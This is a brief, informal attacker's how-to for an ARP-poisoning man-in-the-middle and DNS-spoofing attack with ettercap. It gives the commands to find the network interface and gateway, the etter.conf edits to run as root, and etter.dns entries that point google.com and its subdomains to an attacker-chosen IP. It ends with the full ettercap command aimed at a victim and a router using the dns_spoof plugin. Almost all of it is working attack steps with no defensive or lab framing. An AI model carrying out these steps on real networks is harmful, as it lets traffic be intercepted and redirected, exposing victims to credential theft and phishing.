in Attackers side :
Look interface name with ifconfig
(where ip address is present)
Find router IP with route -n
(under gateway section)
Edit /etc/ettercap/etter.conf
:
set -->
ec_uid = 0
ec_gid = 0
and uncomment 4 lines in "linux section"
Edit /etc/ettercap/etter.dns
with :
google.com A (targetIP)
*.google.com A (target IP)
www.google.com PTR (target IP)
then run :
sudo ettercap -T -q -i (interface) -M arp:remote /(Victim)// /(Router)// -P dns_spoof
in macos :
/opt/homebrew/o/ettercap/.bottle/etc/ettercap/ettercap.dns
location